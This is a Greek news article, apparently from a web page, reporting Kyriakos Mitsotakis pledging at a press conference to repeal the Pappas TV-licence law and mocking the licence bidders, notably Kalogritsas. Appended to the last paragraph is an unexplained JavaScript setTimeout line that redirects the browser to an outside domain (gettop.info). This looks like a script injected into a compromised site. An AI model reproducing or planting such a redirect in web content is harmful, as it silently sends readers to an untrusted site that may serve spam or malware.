Κυριάκος: Σανό για τηλεοπτικές άδειες και βοσκοτόπια Καλογρίτσα

0
13

Με κατηγορηματικό τρόπο ο Κυριάκος Μητσοτάκης δεσμεύτηκε να καταργήσει το νόμο Παππά για τις τηλεοπτικές άδειες αν εκλεγεί πρωθυπουργός και υπογράμμισε ότι δεν θα υπάρξει αριθμητικός περιορισμός στον αριθμό των καναλιών που θα εκπέμπουν στη χώρα.

«Θα καταργήσουμε το νόμο Παππά, θα επιστρέψουμε τον έλεγχο στο ΕΣΡ. Δεν θέλουμε να δημιουργήσουμε ένα ολιγοπώλιο που έχει μέσα του το σπέρμα της διαπλοκής», δήλωσε στη συνέντευξη Τύπου στη ΔΕΘ.

Ο αρχηγός της ΝΔ σχολίασε με ειρωνικό τρόπο την αναφορά του πρωθυπουργού ότι δεν έχειι φίλους και ότι θα χάσει την τηλεοπτική άδεια όποιος δεν έχει χρήματα ή αδυνατεί να δικαιολογήσει την προέλευσή τους. «Αλήθεια; Δεν έγινε έλεγχος πόθεν έσχες για τους καναλάρχες και ειδικότερα για τον Γιάννη Βλαδίμηρο Καλογρίτσα;» αναρωτήθηκε.

«Εγείρονται πολλά θέματα για το πόθεν έσχες των καναλαρχών», είπε, αναφερόμενος στα όσα απίθανα απαδεικνύονται καθημερινά για  τα βοσκοτόπια και τις υπογραφές νεκρών. Και επανέλαβε το αίτημα του κόμματός του να κληθούν στην αρμόδια επιτροπή της Βουλής και οι τέσσερις υπερθεματιστεές, δηλαδή ο Γιάννης Αλαφούζος, ο Θοδωρής Κυριακού, ο Βαγγέλης Μαρινάκης και ο Γιάννης Βλαδίμηρος Καλογρίτσας.

«Περάσαμε απο το σανό στα βοσκοτόπια. Κάποιοι, προφανώς, όχι μόνο δεν έχουν την οικονομική δυνατότητα να αναλάβουν αυτή την υποχρέωση, αλλά προσπαθούν να δείξουν πως μπορούν με κινήσεις που κινούνται στα όρια της γελοιότητας. Δεν πρόκειται εμείς ως μεγάλη παράταξη να επιτρέψουμε τον ευτελισμό αυτής της διαδικασίας. Δεν χρειάζεται να επιστρέψουμε στην εποχή Κοσκωτά και της Τράπεζας Κρήτης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here